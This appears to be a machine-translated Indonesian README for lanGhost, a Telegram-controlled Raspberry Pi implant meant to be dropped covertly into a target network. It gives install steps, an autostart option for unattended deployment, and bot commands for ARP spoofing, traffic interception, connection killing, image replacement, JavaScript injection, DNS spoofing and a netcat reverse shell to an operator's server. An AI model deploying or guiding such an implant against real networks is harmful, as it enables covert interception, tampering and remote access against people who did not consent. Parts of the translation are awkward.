Langhost dirancang untuk raspberry pis ( raspbian / kali untuk rpi ). Menjalankannya pada distro lain/desktop dapat menyebabkan masalah dan mungkin tidak berfungsi seperti yang dikecualikan.
Anda akan memerlukan raspberry pi dengan raspbian/kali segar di kartu SD, karena Anda tidak ingin hal lain berjalan di latar belakang.
Boot PI, dapatkan SSH Jual atau hubungkan monitor dan keyboard dan masukkan perintah ini:
$ sudo apt update && sudo apt install python3 python3-pip
$ git clone https://github.com/xdavidhu/lanGhost
$ cd lanGhost
$ sudo ./setup.py
Harap baca pertanyaan/pesan saat menjalankan skrip pengaturan!
[+] Please enter the name of the network interface connected/will
be connected to the target LAN. Default wired interface is 'eth0',
and the default wireless interface is 'wlan0' on most systems, but
you can check it in a different terminal with the 'ifconfig' command.
[+] Please create a Telegram API key by messaging @BotFather on Telegram
with the command '/newbot'.
After this, @BotFather will ask you to choose a name for your bot.
This can be anything you want.
Lastly, @BotFather will ask you for a username for your bot. You have
to choose a unique username here which ends with 'bot'. For
example: xdavidbot. Make note of this username, since later
you will have to search for this to find your bot, which lanGhost
will be running on.
After you send your username of choise to @BotFather, you will recieve
your API key.
[+] Now for lanGhost to only allow access to you, you need to verify yourself.
Send the verification code below TO THE BOT you just created. Just search for your
bot's @username (what you sent to @BotFather) to find it.
[+] Verification code to send: ******
[+] Do you want lanGhost to start on boot? This option is necessary if you are using
this device as a dropbox, because when you are going to drop this device into a
network, you will not have the chanse to start lanGhost remotely! (autostart works
by adding a new cron '@reboot' entry)
Menggunakan Langhost pada jaringan yang lebih besar dari /24 tidak dianjurkan karena pemindaian akan memakan waktu terlalu lama.
Langhost tidak tenang . Siapa pun yang memantau lalu lintas dapat melihat paket ARP!
Jika Anda telah memilih yes
pada step 4/4 (autostart)
PI sepenuhnya diatur untuk dijatuhkan. Langhost harus memulai boot, dan mengirimi Anda pesan di telegram dengan teks: lanGhost started! ?
.
Pastikan untuk mencobanya di lab Anda terlebih dahulu dan uji jika Langhost menanggapi pesan Anda!
Jika Anda siap, cukup hubungkan ke jaringan target dengan memasukkan kabel Ethernet ke PI dan menghubungkan daya melalui USB mikro dan Anda siap untuk pergi!
(Langhost juga dapat mengerjakan wifi, tetapi Anda harus mengatur wpa_supplicant
untuk terhubung ke jaringan secara otomatis terlebih dahulu)
/scan - Scan LAN network
/scanip [TARGET-IP] - Scan a specific IP address.
/kill [TARGET-IP] - Stop the target's network connection.
/mitm [TARGET-IP] - Capture HTTP/DNS traffic from target.
/replaceimg [TARGET-IP] - Replace HTTP images requested by target.
/injectjs [TARGET-IP] [JS-FILE-URL] - Inject JavaScript into HTTP pages requested by target.
/spoofdns [TARGET-IP] [DOMAIN] [FAKE-IP] - Spoof DNS records for target.
/attacks - View currently running attacks.
/stop [ATTACK-ID] - Stop a currently running attack.
/restart - Restart lanGhost.
/reversesh [TARGET-IP] [PORT] - Create a netcat reverse shell to target.
/help - Display the help menu.
/ping - Pong.
Anda dapat memulai serangan dengan menggunakan salah satu perintah ini: /kill, /mitm, /replaceimg, /injectjs, /spoofdns
Anda memiliki satu atau lebih serangan yang berjalan, Anda dapat menggunakan perintah /attack
untuk mendapatkan daftar mereka yang berisi ATTACK-ID
.
Untuk menghentikan jenis serangan /stop [ATTACK-ID]
.
/reversesh
hanya membuat koneksi NetCat TCP yang tidak dienkripsi dan semua lalu lintas dapat dipantau! Hanya gunakan untuk perbaikan darurat atau untuk menyiapkan koneksi terbalik terenkripsi jika perlu.
Perintah /reversesh
adalah untuk mendapatkan cangkang terbalik pada PI, ketika itu tidak dapat diakses dari luar.
Untuk menggunakan perintah /reversesh
, Anda harus meminta server mendengarkan shell.
Perintah NetCAT untuk memulai pendengar di server Anda:
$ nc -l 0.0.0.0 [PORT]
Perintah telegram:
/reversesh [IP-of-your-listening-server] [PORT]
/kill
- hentikan konektivitas internet untuk target./mitm
- menangkap lalu lintas HTTP dan DNS dari target dan mengirimkannya dalam pesan teks./replaceimg
- Mengganti gambar HTTP untuk target ke gambar apa yang Anda kirim ke bot./injectjs
- menyuntikkan javascript ke setiap respons HTTP HTML untuk target. Anda perlu meng -host file JS di server Anda dan memberikan URL sebagai parameter./spoofdns
- spoofs respons DNS untuk target.Semua serangan menggunakan spoofing ARP !
/scan
- Memindai jaringan lokal dan mengembalikan host secara online. Menggunakan nmap -sn
scan untuk menemukan host./scanip
- Memindai alamat IP untuk port terbuka dan info lainnya. Menggunakan pemindaian nmap -sS
.Anda akan mendapatkan pesan setiap kali ketika perangkat baru menghubungkan/meninggalkan jaringan.
Hak Cipta (C) 2018 oleh David Schütz. Beberapa hak dilindungi undang -undang.
Langhost berada di bawah ketentuan lisensi MIT, mengikuti semua klarifikasi yang dinyatakan dalam file lisensi. Anda juga dapat melanjutkan dan mengirim email kepada saya di XDavid {at} ProtonMail {dot} com.